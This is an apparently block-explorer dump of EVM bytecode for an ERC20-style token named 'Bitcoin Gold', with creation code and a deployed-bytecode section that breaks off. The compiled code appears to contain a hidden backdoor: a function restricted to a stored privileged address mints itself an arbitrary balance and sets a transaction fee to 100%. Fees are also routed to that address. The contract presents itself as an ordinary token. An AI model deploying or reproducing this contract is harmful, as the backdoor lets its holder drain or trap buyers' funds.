0a5f620004cd62000c1660201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055506001600f5f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055506001600b5f60105f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055506001600b5f60085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055506001600f5f6200067262000c1660201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055506001600f5f60105f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055506001600b5f6200074c62000c1660201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055506001600b5f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff02191690831515021790555050620011f2565b5f33905090565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000930576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620009279062001055565b60405180910390fd5b620009478160065462000c3d60201b90919060201c565b6006819055506200099f8160045f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205462000c3d60201b90919060201c565b60045f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000a3f919062001075565b60405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160362000abc576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000ab39062001104565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000b2d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000b249062001198565b60405180910390fd5b8060055f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405162000c09919062001075565b60405180910390a3505050565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b5f818362000c4c9190620011b8565b905092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b600185111562000cde5780860481111562000cb65762000cb562000c54565b5b600185161562000cc65780820291505b808102905062000cd68562000c81565b945062000c96565b94509492505050565b5f8262000cf8576001905062000dca565b8162000d07575f905062000dca565b816001811462000d20576002811462000d2b5762000d61565b600191505062000dca565b60ff84111562000d405762000d3f62000c54565b5b8360020a91508482111562000d5a5762000d5962000c54565b5b5062000dca565b5060208310610133831016604e8410600b841016171562000d9b5782820a90508381111562000d955762000d9462000c54565b5b62000dca565b62000daa848484600162000c8d565b9250905081840481111562000dc45762000dc362000c54565b5b81810290505b9392505050565b5f819050919050565b5f60ff82169050919050565b5f62000df28262000dd1565b915062000dff8362000dda565b925062000e2e7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000ce7565b905092915050565b5f62000e428262000dd1565b915062000e4f8362000dd1565b925082820262000e5f8162000dd1565b9150828204841483151762000e795762000e7862000c54565b5b5092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f62000eaf8262000e84565b9050919050565b62000ec18162000ea3565b811462000ecc575f80fd5b50565b5f8151905062000edf8162000eb6565b92915050565b5f6020828403121562000efd5762000efc62000e80565b5b5f62000f0c8482850162000ecf565b91505092915050565b62000f208162000ea3565b82525050565b5f60408201905062000f3b5f83018562000f15565b62000f4a602083018462000f15565b9392505050565b62000f5c8162000dd1565b82525050565b5f60408201905062000f775f83018562000f15565b62000f86602083018462000f51565b9392505050565b5f8115159050919050565b62000fa38162000f8d565b811462000fae575f80fd5b50565b5f8151905062000fc18162000f98565b92915050565b5f6020828403121562000fdf5762000fde62000e80565b5b5f62000fee8482850162000fb1565b91505092915050565b5f82825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f6200103d601f8362000ff7565b91506200104a8262001007565b602082019050919050565b5f6020820190508181035f8301526200106e816200102f565b9050919050565b5f6020820190506200108a5f83018462000f51565b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f620010ec60248362000ff7565b9150620010f98262001090565b604082019050919050565b5f6020820190508181035f8301526200111d81620010de565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f6200118060228362000ff7565b91506200118d8262001124565b604082019050919050565b5f6020820190508181035f830152620011b18162001172565b9050919050565b5f620011c48262000dd1565b9150620011d18362000dd1565b9250828201905080821115620011ec57620011eb62000c54565b5b92915050565b6126ea80620012005f395ff3fe60806040526004361061012d575f3560e01c8063751039fc116100aa578063a457c2d71161006e578063a457c2d7146103ea578063a9059cbb14610426578063cdf4bab914610462578063d54f7d5e1461048c578063dd62ed3e146104b6578063f2fde38b146104f257610160565b8063751039fc1461032c5780637d1db4a5146103425780638d5f81e21461036c5780638da5cb5b1461039657806395d89b41146103c057610160565b806339509351116100f1578063395093511461025a578063499a28181461029657806351c6590a146102be57806370a08231146102da578063715018a61461031657610160565b806306fdde0314610164578063095ea7b31461018e57806318160ddd146101ca57806323b872dd146101f4578063313ce5671461023057610160565b36610160577f544c765b33ca411cce832250371569244f765a17fcd217832be093f0fd5fa45b60405160405180910390a1005b5f80fd5b34801561016f575f80fd5b5061017861051a565b6040516101859190611bf9565b60405180910390f35b348015610199575f80fd5b506101b460048036038101906101af9190611caa565b610557565b6040516101c19190611d02565b60405180910390f35b3480156101d5575f80fd5b506101de610574565b6040516101eb9190611d2a565b60405180910390f35b3480156101ff575f80fd5b5061021a60048036038101906102159190611d43565b61057d565b6040516102279190611d02565b60405180910390f35b34801561023b575f80fd5b50610244610651565b6040516102519190611dae565b60405180910390f35b348015610265575f80fd5b50610280600480360381019061027b9190611caa565b610659565b60405161028d9190611d02565b60405180910390f35b3480156102a1575f80fd5b506102bc60048036038101906102b79190611dc7565b610707565b005b6102d860048036038101906102d39190611dc7565b610734565b005b3480156102e5575f80fd5b5061030060048036038101906102fb9190611df2565b610790565b60405161030d9190611d2a565b60405180910390f35b348015610321575f80fd5b5061032a6107d6565b005b348015610337575f80fd5b506103406107e9565b005b34801561034d575f80fd5b50610356610805565b6040516103639190611d2a565b60405180910390f35b348015610377575f80fd5b50610380610836565b60405161038d9190611e2c565b60405180910390f35b3480156103a1575f80fd5b506103aa61085e565b6040516103b79190611e2c565b60405180910390f35b3480156103cb575f80fd5b506103d4610885565b6040516103e19190611bf9565b60405180910390f35b3480156103f5575f80fd5b50610410600480360381019061040b9190611caa565b6108c2565b60405161041d9190611d02565b60405180910390f35b348015610431575f80fd5b5061044c60048036038101906104479190611caa565b61098a565b6040516104599190611d02565b60405180910390f35b34801561046d575f80fd5b506104766109a7565b6040516104839190611d02565b60405180910390f35b348015610497575f80fd5b506104a06109bd565b6040516104ad9190611e2c565b60405180910390f35b3480156104c1575f80fd5b506104dc60048036038101906104d79190611e45565b6109e5565b6040516104e99190611d2a565b60405180910390f35b3480156104fd575f80fd5b5061051860048036038101906105139190611df2565b610a67565b005b60606040518060400160405280600c81526020017f426974636f696e20476f6c640000000000000000000000000000000000000000815250905090565b5f61056a610563610ae9565b8484610af0565b6001905092915050565b5f600654905090565b5f610589848484610cb3565b61064684610595610ae9565b610641856040518060600160405280602881526020016126686028913960055f8b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6105f8610ae9565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546115e89092919063ffffffff16565b610af0565b600190509392505050565b5f6012905090565b5f6106fd610665610ae9565b846106f88560055f610675610ae9565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461163c90919063ffffffff16565b610af0565b6001905092915050565b6010543314610714575f80fd5b604051338152600460208201526040812082815560648002600c55505050565b61073c611651565b6001600860146101000a81548160ff02191690831515021790555061076961076261085e565b3083610cb3565b61077381346116cf565b5f600860146101000a81548160ff02191690831515021790555050565b5f60045f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6107de611651565b6107e75f6117af565b565b6107f1611651565b612710600381905550612710600281905550565b5f61083161271061082360035460065461187090919063ffffffff16565b61188590919063ffffffff16565b905090565b5f60085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606040518060400160405280600681526020017fe98791e5ad900000000000000000000000000000000000000000000000000000815250905090565b5f6109806108ce610ae9565b8461097b856040518060600160405280602581526020016126906025913960055f6108f7610ae9565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546115e89092919063ffffffff16565b610af0565b6001905092915050565b5f61099d610996610ae9565b8484610cb3565b6001905092915050565b5f600860149054906101000a900460ff16905090565b5f60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b5f60055f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b610a6f611651565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610add576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ad490611ef3565b60405180910390fd5b610ae6816117af565b50565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b5e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b5590611f81565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610bcc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bc39061200f565b60405180910390fd5b8060055f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610ca69190611d2a565b60405180910390a3505050565b610cbe83838361189a565b5f80610cc861085e565b73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614158015610d365750610d0661085e565b73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b1561129657600f5f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16158015610dd95750600f5f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b156112955760085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16148015610e87575060075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b8015610eda5750600b5f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b8015610f2d5750600b5f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b1561102757610f5d612710610f4f60035460065461187090919063ffffffff16565b61188590919063ffffffff16565b831115610f9f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f969061209d565b60405180910390fd5b610fca612710610fbc60025460065461187090919063ffffffff16565b61188590919063ffffffff16565b610fe584610fd787610790565b61163c90919063ffffffff16565b1115611026576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161101d9061212b565b60405180910390fd5b5b60085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff161480156110af57503073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b1561114d576110dd6127106110cf600d548661187090919063ffffffff16565b61188590919063ffffffff16565b91506111086127106110fa600c548661187090919063ffffffff16565b61188590919063ffffffff16565b90504360095f3273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b60085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161480156111f6575060075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b1561129457611224612710611216600d548661187090919063ffffffff16565b61188590919063ffffffff16565b915061124f612710611241600e548661187090919063ffffffff16565b61188590919063ffffffff16565b90504360095f3273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b5b5b5f6112aa828461163c90919063ffffffff16565b90505f81111561143f575f8311156112c7576112c686846119bd565b5b5f821115611429576113408260045f60105f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461163c90919063ffffffff16565b60045f60105f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555060105f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516114209190611d2a565b60405180910390a35b61143c8185611b5a90919063ffffffff16565b93505b6114a9846040518060600160405280602681526020016126426026913960045f8a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546115e89092919063ffffffff16565b60045f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555061153a8460045f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461163c90919063ffffffff16565b60045f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef866040516115d89190611d2a565b60405180910390a3505050505050565b5f83831115829061162f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116269190611bf9565b60405180910390fd5b5082840390509392505050565b5f81836116499190612176565b905092915050565b611659610ae9565b73ffffffffffffffffffffffffffffffffffffffff1661167761085e565b73ffffffffffffffffffffffffffffffffffffffff16146116cd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116c4906121f3565b60405180910390fd5b565b6116fb3060075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684610af0565b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d7198230855f8061174561085e565b426040518863ffffffff1660e01b815260040161176796959493929190612253565b60606040518083038185885af1158015611783573d5f803e3d5ffd5b50505050506040513d601f19601f820116820180604052508101906117a891906122c6565b5050505050565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f818361187d9190612316565b905092915050565b5f81836118929190612384565b905092915050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611908576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118ff90612424565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611976576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161196d906124b2565b60405180910390fd5b5f81116119b8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119af90612540565b60405180910390fd5b505050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611a2b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a22906125ce565b60405180910390fd5b611a95816040518060600160405280602281526020016126206022913960045f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546115e89092919063ffffffff16565b60045f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550611aeb81600654611b5a90919063ffffffff16565b6006819055505f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611b4e9190611d2a565b60405180910390a35050565b5f8183611b6791906125ec565b905092915050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015611ba6578082015181840152602081019050611b8b565b5f8484015250505050565b5f601f19601f8301169050919050565b5f611bcb82611b6f565b611bd58185611b79565b9350611be5818560208601611b89565b611bee81611bb1565b840191505092915050565b5f6020820190508181035f830152611c118184611bc1565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f611c4682611c1d565b9050919050565b611c5681611c3c565b8114611c60575f80fd5b50565b5f81359050611c7181611c4d565b92915050565b5f819050919050565b611c8981611c77565b8114611c93575f80fd5b50565b5f81359050611ca481611c80565b92915050565b5f8060408385031215611cc057611cbf611c19565b5b5f611ccd85828601611c63565b9250506020611cde85828601611c96565b9150509250929050565b5f8115159050919050565b611cfc81611ce8565b82525050565b5f602082019050611d155f830184611cf3565b92915050565b611d2481611c77565b82525050565b5f602082019050611d3d5f830184611d1b565b92915050565b5f805f60608486031215611d5a57611d59611c19565b5b5f611d6786828701611c63565b9350506020611d7886828701611c63565b9250506040611d8986828701611c96565b9150509250925092565b5f60ff82169050919050565b611da881611d93565b82525050565b5f602082019050611dc15f830184611d9f565b92915050565b5f60208284031215611ddc57611ddb611c19565b5b5f611de984828501611c96565b91505092915050565b5f60208284031215611e0757611e06611c19565b5b5f611e1484828501611c63565b91505092915050565b611e2681611c3c565b82525050565b5f602082019050611e3f5f830184611e1d565b92915050565b5f8060408385031215611e5b57611e5a611c19565b5b5f611e6885828601611c63565b9250506020611e7985828601611c63565b9150509250929050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f611edd602683611b79565b9150611ee882611e83565b604082019050919050565b5f6020820190508181035f830152611f0a81611ed1565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f611f6b602483611b79565b9150611f7682611f11565b604082019050919050565b5f6020820190508181035f830152611f9881611f5f565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f611ff9602283611b79565b915061200482611f9f565b604082019050919050565b5f6020820190508181035f83015261202681611fed565b9050919050565b7f5472616e7366657220616d6f756e74206578636565647320746865206d6178545f8201527f78416d6f756e742e000000000000000000000000000000000000000000000000602082015250565b5f612087602883611b79565b91506120928261202d565b604082019050919050565b5f6020820190508181035f8301526120b48161207b565b9050919050565b7f45786365656473206d6178696d756d2077616c6c657420746f6b656e20616d6f5f8201527f756e740000000000000000000000000000000000000000000000000000000000602082015250565b5f612115602383611b79565b9150612120826120bb565b604082019050919050565b5f6020820190508181035f83015261214281612109565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61218082611c77565b915061218b83611c77565b92508282019050808211156121a3576121a2612149565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f6121dd602083611b79565b91506121e8826121a9565b602082019050919050565b5f6020820190508181035f83015261220a816121d1565b9050919050565b5f819050919050565b5f819050919050565b5f61223d61223861223384612211565b61221a565b611c77565b9050919050565b61224d81612223565b82525050565b5f60c0820190506122665f830189611e1d565b6122736020830188611d1b565b6122806040830187612244565b61228d6060830186612244565b61229a6080830185611e1d565b6122a760a0830184611d1b565b979650505050505050565b5f815190506122c081611c80565b92915050565b5f805f606084860312156122dd576122dc611c19565b5b5f6122ea868287016122b2565b93505060206122fb868287016122b2565b925050604061230c868287016122b2565b9150509250925092565b5f61232082611c77565b915061232b83611c77565b925082820261233981611c77565b915082820484148315176123505761234f612149565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f61238e82611c77565b915061239983611c77565b9250826123a9576123a8612357565b5b828204905092915050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f61240e602583611b79565b9150612419826123b4565b604082019050919050565b5f6020820190508181035f83015261243b81612402565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f61249c602383611b79565b91506124a782612442565b604082019050919050565b5f6020820190508181035f8301526124c981612490565b9050919050565b7f5472616e7366657220616d6f756e74206d7573742062652067726561746572205f8201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b5f61252a602983611b79565b9150612535826124d0565b604082019050919050565b5f6020820190508181035f8301526125578161251e565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f206164647265735f8201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b5f6125b8602183611b79565b91506125c38261255e565b604082019050919050565b5f6020820190508181035f8301526125e5816125ac565b9050919050565b5f6125f682611c77565b915061260183611c77565b925082820390508181111561261957612618612149565b5b9291505056fe45524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220a1e9c028af6be8056c615dd0a9d9a3cfaabbcf2afdf10c8bc21780f3c54bbf2364736f6c63430008140033

Deployed Bytecode

0x60806040526004361061012d575f3560e01c8063751039fc116100aa578063a457c2d71161006e578063a457c2d7146103ea578063a9059cbb14610426578063cdf4bab914610462578063d54f7d5e1461048c578063dd62ed3e146104b6578063f2fde38b146104f257610160565b8063751039fc1461032c5780637d1db4a5146103425780638d5f81e21461036c5780638da5cb5b1461039657806395d89b41146103c057610160565b806339509351116100f1578063395093511461025a578063499a28181461029657806351c6590a146102be57806370a08231146102da578063715018a61461031657610160565b806306fdde0314610164578063095ea7b31461018e57806318160ddd146101ca57806323b872dd146101f4578063313ce5671461023057610160565b36610160577f544c765b33ca411cce832250371569244f765a17fcd217832be093f0fd5fa45b60405160405180910390a1005b5f80fd5b34801561016f575f80fd5b5061017861051a565b6040516101859190611bf9565b60405180910390f35b348015610199575f80fd5b506101b460048036038101906101af9190611caa565b610557565b6040516101c19190611d02565b60405180910390f35b3480156101d5575f80fd5b506101de610574565b6040516101eb9190611d2a565b60405180910390f35b3480156101ff575f80fd5b5061021a60048036038101906102159190611d43565b61057d565b6040516102279190611d02565b60405180910390f35b34801561023b575f80fd5b50610244610651565b6040516102519190611dae565b60405180910390f35b348015610265575f80fd5b50610280600480360381019061027b9190611caa565b610659565b60405161028d9190611d02565b60405180910390f35b3480156102a1575f80fd5b506102bc60048036038101906102b79190611dc7565b610707565b005b6102d860048036038101906102d39190611dc7565b610734565b005b3480156102e5575f80fd5b5061030060048036038101906102fb9190611df2565b610790565b60405161030d9190611d2a565b60405180910390f35b348015610321575f80fd5b5061032a6107d6565b005b348015610337575f80fd5b506103406107e9565b005b34801561034d575f80fd5b50610356610805565b6040516103639190611d2a565b60405180910390f35b348015610377575f80fd5b50610380610836565b60405161038d9190611e2c565b60405180910390f35b3480156103a1575f80fd5b506103aa61085e565b6040516103b79190611e2c565b60405180910390f35b3480156103cb575f80fd5b506103d4610885565b6040516103e19190611bf9565b60405180910390f35b3480156103f5575f80fd5b50610410600480360381019061040b9190611caa565b6108c2565b60405161041d9190611d02565b60405180910390f35b348015610431575f80fd5b5061044c60048036038101906104479190611caa565b61098a565b6040516104599190611d02565b60405180910390f35b34801561046d575f80fd5b506104766109a7565b6040516104839190611d02565b60405180910390f35b348015610497575f80fd5b506104a06109bd565b6040516104ad9190611e2c565b60405180910390f35b3480156104c1575f80fd5b506104dc60048036038101906104d79190611e45565b6109e5565b6040516104e99190611d2a565b60405180910390f35b3480156104fd575f80fd5b5061051860048036038101906105139190611df2565b610a67565b005b60606040518060400160405280600c81526020017f426974636f696e20476f6c640000000000000000000000000000000000000000815250905090565b5f61056a610563610ae9565b8484610af0565b6001905092915050565b5f600654905090565b5f610589848484610cb3565b61064684610595610ae9565b610641856040518060600160405280602881526020016126686028913960055f8b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6105f8610ae9565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546115e89092919063ffffffff16565b610af0565b600190509392505050565b5f6012905090565b5f6106fd610665610ae9565b846106f88560055f610675610ae9565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461163c90919063ffffffff16565b610af0565b6001905092915050565b6010543314610714575f80fd5b604051338152600460208201526040812082815560648002600c55505050565b61073c611651565b6001600860146101000a81548160ff02191690831515021790555061076961076261085e565b3083610cb3565b61077381346116cf565b5f600860146101000a81548160ff02191690831515021790555050565b5f60045f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6107de611651565b6107e75f6117af565b565b6107f1611651565b612710600381905550612710600281905550565b5f61083161271061082360035460065461187090919063ffffffff16565b61188590919063ffffffff16565b905090565b5f60085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606040518060400160405280600681526020017fe98791e5ad900000000000000000000000000000000000000000000000000000815250905090565b5f6109806108ce610ae9565b8461097b856040518060600160405280602581526020016126906025913960055f6108f7610ae9565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546115e89092919063ffffffff16565b610af0565b6001905092915050565b5f61099d610996610ae9565b8484610cb3565b6001905092915050565b5f600860149054906101000a900460ff16905090565b5f60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b5f60055f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff167